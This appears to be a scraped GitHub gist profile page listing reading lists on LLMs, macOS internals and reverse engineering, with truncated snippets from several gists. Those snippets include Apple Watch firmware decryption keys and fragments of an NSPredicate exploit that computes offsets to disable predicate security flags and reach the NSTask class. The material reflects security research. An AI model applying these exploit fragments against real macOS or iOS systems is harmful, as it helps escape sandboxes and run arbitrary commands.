Phil pwmoore

Index

#prepreqs
#roadmap
- #iot
- #chrome-and-friends: Chrome, V8, Blink, Mojo, etc.
- Linux kernel #todo
- expdev #todo

fuzzing #todo

Anti-hype LLM reading list

Goals: Add links that are reasonable and good explanations of how stuff works. No hype and no vendor content if possible. Practical first-hand accounts of models in prod eagerly sought.

Foundational Concepts

Pre-Transformer Models

macOS Internals

Understand your Mac and iPhone more deeply by tracing the evolution of Mac OS X from prelease to Swift. John Siracusa delivers the details.

Starting Points

How to use this gist

You've got two main options:

Purpose

Bootstrap knowledge of LLMs ASAP. With a bias/focus to GPT.

Avoid being a link dump. Try to provide only valuable well tuned information.

Prelude

Neural network links before starting with transformers.

Assembly Language / Reversing / Malware Analysis / Game Hacking -resources

⭐Assembly Language

Modern x64 Assembly

https://www.youtube.com/playlist?list=PLKK11Ligqitg9MOX3-0tFT1Rmh3uJp7kA

	// dump classes and selectors forbidden in NSPredicates
	// `cc -framework Foundation -o restricted restricted.m`
	#import <Foundation/Foundation.h>
	#import <dlfcn.h>

	int main() {
	void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
	NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
	NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
	NSLog(@"Restricted Selectors: %@", RestrictedSelectors());


	const typeMap = {
	"c": "char",
	"i": "int",
	"s": "short",
	"l": "long",
	"q": "long long",
	"C": "unsigned char",
	"I": "unsigned int",
	"S": "unsigned short",

	[
	{
	"fw": "Watch6,1_7.5_18T567_Restore.ipsw",
	"file": "LLB.n157s.RELEASE.im4p",
	"kbag": "ED5083404184FFD4B6B3AC3BAC11784F1523E552FB434250AE9AFAC4D969C017E392277BDB33F73D136ADB74300469F2",
	"key": "4ab9cec46db6e89b061c2f12cb9a21b3fa659fa9f076afba2377184011250b459c0e55837d04e463d9242e1447f75cdb"
	},
	{
	"fw": "Watch6,1_7.5_18T567_Restore.ipsw",
	"file": "iBEC.n157s.RELEASE.im4p",

	NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast to get nice error in syslog for debugging
	// use format string to read the address of _NSPredicateUtilities ( #self() ), theres prolly a better way
	"$_NSPredicateUtilities := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue,"
	"$_predicateSecurityFlags := $_NSPredicateUtilities + 0x188c," // address of _predicateSecurityFlags
	"$_predicateSecurityOnce := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce
	"$forbiddenClassesLength := $_predicateSecurityFlags + 0x63a334," // address of length field for array of forbidden classes
	"$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4," // address of length field for array of forbidden selectors

	"$NSTask := $_NSPredicateUtilities + 0x637860," // address of NSTask class
	"$NSPipe := $NSTask - 0x41a0," // address of NSPipe class

	#import <Foundation/Foundation.h>

	/*
	[~/predicament]$ gcc -framework Foundation -lobjc -o predicament predicament.m
	[~/predicament]$ ./predicament "function('','stringByAppendingFormat:','%lld ').longLongValue"
	Expr: 'FUNCTION("", "stringByAppendingFormat:" , "%lld ").longLongValue' (type: 4)

	Value: 105553129238592
	Danger: 105553129237664 (offset 928)
	[~/predicament]$ ./predicament "function(function('','stringByAppendingFormat:','%lld ').longLongValue-928,'longValue').dangerous"